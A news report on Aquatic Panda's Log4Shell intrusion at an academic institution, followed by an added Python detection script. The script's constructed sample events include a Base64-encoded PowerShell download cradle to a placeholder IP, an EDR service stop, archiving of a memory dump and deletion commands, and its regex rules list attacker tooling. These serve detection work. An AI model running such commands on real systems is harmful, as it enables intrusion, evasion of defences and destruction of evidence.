A China-linked cyber-espionage group tracked as Aquatic Panda was recently spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) to break into a large academic institution.
According to the latest report from CrowdStrike’s Falcon OverWatch team, the adversary used a modified version of a Log4Shell exploit (the original was published on GitHub on December 13) to gain access to a VMware Horizon instance at the unnamed institution; Horizon bundled the vulnerable Log4j library.
The purpose of the attack is unknown because the intrusion was thwarted.
“OverWatch uncovered suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion,” the team said.
The threat actor first performed connectivity checks via DNS lookups for a subdomain, executed from the Apache Tomcat service running on the VMware Horizon instance. The attackers then executed a series of Linux commands on the Windows host, still under the Apache Tomcat service, to retrieve additional tools hosted on remote infrastructure.
Aquatic Panda performed reconnaissance from the host to better understand current privilege levels and system and domain details. The adversary also attempted to discover and stop a third-party endpoint detection and response (EDR) service.
The hackers then downloaded additional scripts and executed a Base64-encoded command via PowerShell to retrieve malware from their toolkit. The OverWatch team also observed multiple attempts at credential harvesting, including a memory dump, which the threat actor compressed with WinRAR in preparation for exfiltration. Finally, they deleted all executables from the ProgramData and Windows\temp\ directories to cover their tracks.
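Every step described above (a Tomcat service process spawning shells, DNS connectivity checks, host and domain discovery, an attempt to stop the EDR service, a Base64-encoded PowerShell download cradle, WinRAR staging and cleanup of ProgramData and Windows\temp) leaves a trace in process-creation telemetry. The following is an added example, not CrowdStrike's or the incident's own code: a small Python triage script run over constructed Sysmon-style process-creation events (parent image, image, command line). The sample events, the Horizon Tomcat binary name ws_TomcatService.exe, the service name EdrAgentSvc, the IP address 198.51.100.7 and the domain names are all assumptions or placeholders, not indicators from the report.

```python
"""Added example: triage of process-creation events for post-Log4Shell activity
under a VMware Horizon Tomcat service. All events below are constructed."""
import base64
import re
from typing import Dict, List, Optional

# Assumed binary names for Horizon's embedded Tomcat and generic Java web servers.
WEB_PARENTS = {"ws_tomcatservice.exe", "tomcat9.exe", "java.exe"}
# Shells and living-off-the-land binaries a web server should never spawn.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "nslookup.exe", "whoami.exe",
    "systeminfo.exe", "net.exe", "net1.exe", "sc.exe", "nltest.exe",
    "certutil.exe", "bitsadmin.exe", "curl.exe", "rar.exe", "rundll32.exe",
}
# powershell -e/-ec/-en/-enc/-EncodedCommand <base64 of UTF-16LE script>
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Behavioural rules, checked against the command line plus any decoded payload.
RULES = [
    ("dns_connectivity_check", re.compile(r"(?i)\b(?:nslookup|resolve-dnsname)\b")),
    ("host_discovery", re.compile(r"(?i)\b(?:whoami|systeminfo|nltest|net\s+(?:group|user|localgroup))\b")),
    ("remote_tool_retrieval", re.compile(r"(?i)(?:downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|certutil.*-urlcache|bitsadmin)")),
    ("edr_service_stop", re.compile(r"(?i)\b(?:sc(?:\.exe)?\s+stop|net1?(?:\.exe)?\s+stop|stop-service)\b")),
    ("archive_staging", re.compile(r"(?i)\brar(?:\.exe)?\s+a\b")),
    ("artifact_cleanup", re.compile(r"(?i)\b(?:del|erase|remove-item)\b.*(?:programdata|windows\\temp)")),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def encode_powershell(script: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(ev: Dict[str, str]) -> Dict[str, object]:
    """Evaluate one process-creation event; hits are the rule names that fired."""
    parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
    hits: List[str] = []
    web_lineage = parent in WEB_PARENTS and image in SUSPICIOUS_CHILDREN
    if web_lineage:
        hits.append("web_server_spawned_tooling")
    decoded = decode_encoded_powershell(cmd)
    if decoded is not None:
        hits.append("powershell_encoded_command")
    effective = cmd if decoded is None else cmd + " " + decoded
    hits.extend(name for name, rx in RULES if rx.search(effective))
    return {"cmdline": cmd, "decoded": decoded, "hits": hits,
            "severity": "high" if web_lineage else "medium"}


def analyze(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the events that triggered at least one rule, in input order."""
    return [r for r in map(analyze_event, events) if r["hits"]]


# Constructed sample telemetry (placeholder names and addresses, not real IOCs).
TOMCAT = r"C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe"
CMD = r"C:\Windows\System32\cmd.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/tools/stage.ps1')"
SAMPLE_EVENTS = [
    {"parent": TOMCAT, "image": CMD, "cmdline": "cmd.exe /c nslookup beacon.check.example.invalid"},
    {"parent": TOMCAT, "image": CMD, "cmdline": "cmd.exe /c whoami /priv && systeminfo"},
    {"parent": TOMCAT, "image": CMD, "cmdline": "cmd.exe /c sc query EdrAgentSvc & sc stop EdrAgentSvc"},
    {"parent": TOMCAT, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)},
    {"parent": CMD, "image": r"C:\Program Files\WinRAR\rar.exe",
     "cmdline": r"rar.exe a -hpStagingKey C:\ProgramData\out.rar C:\ProgramData\mem.dmp"},
    {"parent": TOMCAT, "image": CMD, "cmdline": r"cmd.exe /c del /q C:\ProgramData\*.exe C:\Windows\Temp\*.exe"},
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},  # benign control event
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding["severity"], finding["hits"], finding["cmdline"][:60])
```

The lineage rule is the one that generalises: whatever the next Java deserialisation or JNDI bug is, a web-server service process that spawns cmd.exe, PowerShell or nslookup is an anomaly worth paging on, and the behavioural rules then order the timeline. Decoding -EncodedCommand before matching matters because the download cradle is invisible in the raw command line.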
“Based on the actionable intelligence provided by OverWatch, the victim organization was able to quickly implement their incident response protocol, eventually patching the vulnerable application and preventing further threat actor activity on the host,” CrowdStrike said.